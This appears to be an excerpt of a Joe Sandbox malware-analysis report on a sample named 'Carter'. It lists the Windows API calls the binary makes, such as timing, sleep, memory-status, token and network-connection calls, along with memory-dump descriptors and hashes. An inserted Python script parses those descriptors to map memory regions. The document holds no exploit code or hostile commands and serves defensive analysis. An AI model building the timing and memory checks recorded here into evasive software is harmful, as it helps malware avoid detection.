                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 0104195E
                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 01041983
                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 0104198D
                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,010404EC,?,0104153F,?,00008000), ref: 010419C0
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: 0dbf1b8961c4f55951fdb1ef27ffcd14fb6fc02fe813393cff3c1ffc018904d3
                                                                        • Instruction ID: c80562b4f4c818755ad472b1d281ac1116595103b325e501775ccb473c5460bc
                                                                        • Opcode Fuzzy Hash: 0dbf1b8961c4f55951fdb1ef27ffcd14fb6fc02fe813393cff3c1ffc018904d3
                                                                        • Instruction Fuzzy Hash: E4117C75C0451DEBCF109FA4E588AEEBFB8FF09751F004165E9C0B2248DB35AA90CB91
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0106E1EA
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0106E201
                                                                        • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0106E216
                                                                        • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0106E234
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                        • String ID:
                                                                        • API String ID: 1352324309-0
                                                                        • Opcode ID: ccec65d67854cf877769608f41a365454aed9a7564877f447d1f5326d5450b62
                                                                        • Instruction ID: cdb79b88dad10b60fd636ff80a1444ff8590578f1f0e9b15a93b876dd43b057e
                                                                        • Opcode Fuzzy Hash: ccec65d67854cf877769608f41a365454aed9a7564877f447d1f5326d5450b62
                                                                        • Instruction Fuzzy Hash: 4B1161B9605306DFE330CF51DD08F97BBBDEB00B04F008659A696D6044E7B5E5149BA1
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction ID: 674b585c373dc046d94756eec2169a3d0eb2c0da29151af4dbd4b39b5c08c045
                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction Fuzzy Hash: 2F015A7208414EBBCF126E88CC41CEE3F62BB2D254F588555FE9859138D33AC5B2AB91
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0106B956
                                                                        • ScreenToClient.USER32(?,?), ref: 0106B96E
                                                                        • ScreenToClient.USER32(?,?), ref: 0106B992
                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0106B9AD
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: 6d1ef34493c4e533dd15a68b8238358508d2c0fdb3d6edce57dfefe07035b9b3
                                                                        • Instruction ID: 4705fbaa1471278db0d7bf25bc2e49b6a6f65805113525e860eb58ef50755af5
                                                                        • Opcode Fuzzy Hash: 6d1ef34493c4e533dd15a68b8238358508d2c0fdb3d6edce57dfefe07035b9b3
                                                                        • Instruction Fuzzy Hash: 371174B9D00209EFDB51DFA8D484AEEBBF9FF49210F104156E954E3214D735AA618F50
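The "Source File" and "Associated" names repeated in every block above are Joe Sandbox memory-dump descriptors; they encode the process, the base address and the page protection of each dumped region of the image at 0x00FE0000. The Python below is an added example, not part of the Joe Sandbox report or its tooling, that parses those names and rebuilds the region layout from the six descriptors this section lists. The field meanings are inferred from the values on the page: the first field (0x1C = 28) and second field (2) match the snapshot name hcaresult_28_2_fe0000_Carter, the fourth matches the listed region bases and the "Offset: 00FE0000", the fifth takes the Windows PAGE_* protection values and the seventh is MEM_IMAGE (0x01000000); the remaining fields are assumptions and are ignored. The descriptor carries no size, so the example assumes each region extends up to the next region's base when it maps a listed call site such as ref: 0106B956 to its region.

```python
"""Parse Joe Sandbox memory-dump descriptors (the "Source File" / "Associated"
names in this report) and rebuild the layout of the dumped image.

Example descriptor, split on '.':
  0000001C . 00000002 . 4142180890 . 0000000000FE1000 . 00000020 . 00000001 . 01000000 . 0000000F . sdmp
  [0] process id        0x1C = 28, matches the snapshot name hcaresult_28_2_fe0000_Carter
  [1] analysis run      2, matches the "_2" in that snapshot name (assumption)
  [2] dump counter      assumption, unused here
  [3] region base       matches the listed region bases and "Offset: 00FE0000"
  [4] page protection   Windows PAGE_* constants (0x02, 0x04, 0x20 appear in this section)
  [5] unknown           assumption, unused here
  [6] region type       0x01000000 = MEM_IMAGE
  [7] unknown           assumption, unused here
"""
from dataclasses import dataclass
import re

# MEMORY_BASIC_INFORMATION.Protect values from winnt.h
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# MEMORY_BASIC_INFORMATION.Type values
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DESCRIPTOR_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\."
    r"([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)

# The six descriptors this section lists for the image at 0x00FE0000 (process 28, run 2).
IMAGE_BASE = 0x00FE0000
SECTION_DESCRIPTORS = [
    "0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp",
    "0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp",
    "0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp",
    "0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp",
    "0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp",
    "0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp",
]


@dataclass(frozen=True)
class DumpRegion:
    pid: int
    run: int
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        # Modifier bits (PAGE_GUARD 0x100, PAGE_NOCACHE 0x200) sit above the base protection.
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:X}")

    @property
    def executable(self) -> bool:
        return (self.protect & 0xF0) != 0  # PAGE_EXECUTE* are 0x10..0x80


def parse_descriptor(name: str) -> DumpRegion:
    m = DESCRIPTOR_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump descriptor: {name!r}")
    pid, run, _counter, base, protect, _f5, mem_type, _f7 = m.groups()
    return DumpRegion(int(pid, 16), int(run, 16), int(base, 16), int(protect, 16), int(mem_type, 16))


def module_layout(descriptors, image_base):
    """Regions sorted by address, each paired with its offset from the image base
    (the report's "Offset: 00FE0000"). Sizes are not in the descriptor, so only bases are known."""
    regions = sorted((parse_descriptor(d) for d in descriptors), key=lambda r: r.base)
    return [(r.base - image_base, r) for r in regions]


def region_for(addr, descriptors):
    """Map a code address printed in the report (e.g. 'ref: 0106B956') to the region
    containing it. Assumption: each region extends up to the next region's base."""
    hit = None
    for _, r in module_layout(descriptors, 0):
        if r.base <= addr:
            hit = r
        else:
            break
    return hit


if __name__ == "__main__":
    for off, r in module_layout(SECTION_DESCRIPTORS, IMAGE_BASE):
        print(f"+0x{off:06X}  base=0x{r.base:08X}  {r.protect_name:<22} {r.type_name}")
    for site in (0x0106B956, 0x00FE260D, 0x0104B739):
        r = region_for(site, SECTION_DESCRIPTORS)
        print(f"ref {site:08X} -> region 0x{r.base:08X} executable={r.executable}")
```

Run stand-alone, the script prints the six regions in address order with their offsets from the image base; the only executable region is the one at 0x00FE1000 (PAGE_EXECUTE_READ), and every call site quoted in this section resolves into it, which is the quick sanity check worth making before trusting the "based on PE: true" association when rebasing the dump in a disassembler.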
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 010471A1
                                                                          • Part of subcall function 01047C7F: _memset.LIBCMT ref: 01047CB4
                                                                        • _memmove.LIBCMT ref: 010471C4
                                                                        • _memset.LIBCMT ref: 010471D1
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 010471E1
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                        • String ID:
                                                                        • API String ID: 48991266-0
                                                                        • Opcode ID: f2262ffe4f8ed17c1f8ab403da2a18d1bd54c8516426fd699861b50a53a1a1f4
                                                                        • Instruction ID: 78abbc639ef334eb3490757e6e4a5567a3a5989a2d08ac5f3fec4c921c300af1
                                                                        • Opcode Fuzzy Hash: f2262ffe4f8ed17c1f8ab403da2a18d1bd54c8516426fd699861b50a53a1a1f4
                                                                        • Instruction Fuzzy Hash: 6CF05E7A600104ABCF116F55ECC4A8ABB29EF55320F08C065FE48AE25AC736E811DBB4
                                                                        APIs
                                                                          • Part of subcall function 00FE16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FE1729
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1738
                                                                          • Part of subcall function 00FE16CF: BeginPath.GDI32(?), ref: 00FE174F
                                                                          • Part of subcall function 00FE16CF: SelectObject.GDI32(?,00000000), ref: 00FE1778
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0106C3E8
                                                                        • LineTo.GDI32(00000000,?,?), ref: 0106C3F5
                                                                        • EndPath.GDI32(00000000), ref: 0106C405
                                                                        • StrokePath.GDI32(00000000), ref: 0106C413
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                        • String ID:
                                                                        • API String ID: 1539411459-0
                                                                        • Opcode ID: ba0c386112b87cfc5305bcdda43261e15611055679bf00bf77f45172b005d0ae
                                                                        • Instruction ID: 2ee5419fcc3da5f1cf48f09b300e4db57c82832528856014b5f4df1d86123003
                                                                        • Opcode Fuzzy Hash: ba0c386112b87cfc5305bcdda43261e15611055679bf00bf77f45172b005d0ae
                                                                        • Instruction Fuzzy Hash: 88F0BE32041259BAEB236F55AC09FDE3F99AF06320F088140FAD1710D9C7BA1190DBE9
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0103AA6F
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0103AA82
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0103AA89
                                                                        • AttachThreadInput.USER32(00000000), ref: 0103AA90
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 2710830443-0
                                                                        • Opcode ID: 6c9e64cd2f974eceb7b565c730e62a5c3a4ac67dfe91d7091607a95000e8339a
                                                                        • Instruction ID: 8b99f97483bcd812eb873f7fd6da18ef7bc26b8a482639dcf1f2d8f326138f1e
                                                                        • Opcode Fuzzy Hash: 6c9e64cd2f974eceb7b565c730e62a5c3a4ac67dfe91d7091607a95000e8339a
                                                                        • Instruction Fuzzy Hash: A7E0E532A45228B6DB315EA1DD0DED77F5CEF567A1F008115F589D5044C7778541CBE0
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00FE260D
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00FE2617
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00FE262C
                                                                        • GetStockObject.GDI32(00000005), ref: 00FE2634
                                                                        • GetWindowDC.USER32(?,00000000), ref: 0101C1C4
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0101C1D1
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0101C1EA
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0101C203
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 0101C223
                                                                        • ReleaseDC.USER32(?,00000000), ref: 0101C22E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: 4d93d69fcde6d6e1f5bfe87b997c9c05f43fc58e00b406e3498bc93dda8f9e35
                                                                        • Instruction ID: fd333594b602735c6c4996f48ab0ec806f75feae256526239537ffcff1dcdf34
                                                                        • Opcode Fuzzy Hash: 4d93d69fcde6d6e1f5bfe87b997c9c05f43fc58e00b406e3498bc93dda8f9e35
                                                                        • Instruction Fuzzy Hash: 0CE06531944244BBEF715F68B8097D83B11FB06331F048366FAA9980DD87764580DB11
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 01039339
                                                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,01038F04), ref: 01039340
                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,01038F04), ref: 0103934D
                                                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,01038F04), ref: 01039354
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: 34a5fb7bb0c2d4e48fb62c49943b8a5587abadfa4c52037f326331c01f59586c
                                                                        • Instruction ID: e3e35bbca18534687bff61648bcaa26a048dc915695732fd47d4ba7e6fda6515
                                                                        • Opcode Fuzzy Hash: 34a5fb7bb0c2d4e48fb62c49943b8a5587abadfa4c52037f326331c01f59586c
                                                                        • Instruction Fuzzy Hash: 45E08672A01211AFD7711FB55D0DB977BACEF427A5F108858B2C5E9088E7799045C760
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 01020679
                                                                        • GetDC.USER32(00000000), ref: 01020683
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010206A3
                                                                        • ReleaseDC.USER32(?), ref: 010206C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: cbd3a1119d628dd1b62e943b38a02b168a9692b798e263baa14a7adef7828e7b
                                                                        • Instruction ID: 4ef6d132597e73bdfa64355ca10ad0f579a5d13b79a477beae27c828c17eb97f
                                                                        • Opcode Fuzzy Hash: cbd3a1119d628dd1b62e943b38a02b168a9692b798e263baa14a7adef7828e7b
                                                                        • Instruction Fuzzy Hash: E9E01A71C00204EFCB219FA1D808A5D7BF5FB8C310F218109F89AE7208CB7D95419F50
                                                                        APIs
                                                                        • GetDesktopWindow.USER32 ref: 0102068D
                                                                        • GetDC.USER32(00000000), ref: 01020697
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 010206A3
                                                                        • ReleaseDC.USER32(?), ref: 010206C4
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 2889604237-0
                                                                        • Opcode ID: d0d76798f719577f3e7121a9ef612433967da2afc1e2b356b252ec0dbf48bc2d
                                                                        • Instruction ID: a9f872feed48cbf585fc2c7cb380a733285ac73daea020e8fa48419a4ae927d6
                                                                        • Opcode Fuzzy Hash: d0d76798f719577f3e7121a9ef612433967da2afc1e2b356b252ec0dbf48bc2d
                                                                        • Instruction Fuzzy Hash: 5FE01A71C00204AFCB219FA1D80865D7BF5BB8C310F208108F999E7208CB7D95419F50
                                                                        APIs
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                        • __wcsnicmp.LIBCMT ref: 0104B670
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0104B739
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 3222508074-1350329615
                                                                        • Opcode ID: 4ffcc5f823a61ad021117943940505868de945a0c1c2bea7c494c88ce3575119
                                                                        • Instruction ID: 68c9bbf972450835a585fa8882a291714bc7d9003a4fc7e14184ac21c25ebada
                                                                        • Opcode Fuzzy Hash: 4ffcc5f823a61ad021117943940505868de945a0c1c2bea7c494c88ce3575119
                                                                        • Instruction Fuzzy Hash: 25616FB5A00219AFDB15DF98C891EAEB7F4FF08710F0480A9F586AB291D774EE41CB50
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00FEE01E
                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FEE037
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemorySleepStatus
                                                                        • String ID: @
                                                                        • API String ID: 2783356886-2766056989
                                                                        • Opcode ID: 73764abfa01c747bb301da091fe7647a5303ec50cbf7514555754756ca5ab096
                                                                        • Instruction ID: aa21a8279a097c50d9f78b9716fe9a1dbc3c319a02d016dc00b68b2f65fa23dc
                                                                        • Opcode Fuzzy Hash: 73764abfa01c747bb301da091fe7647a5303ec50cbf7514555754756ca5ab096
                                                                        • Instruction Fuzzy Hash: 945159724087849BE320AF51EC86BAFBBF8FF84314F41484DF2D841195DB75A529DB16
                                                                        APIs
                                                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 01068186
                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0106819B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
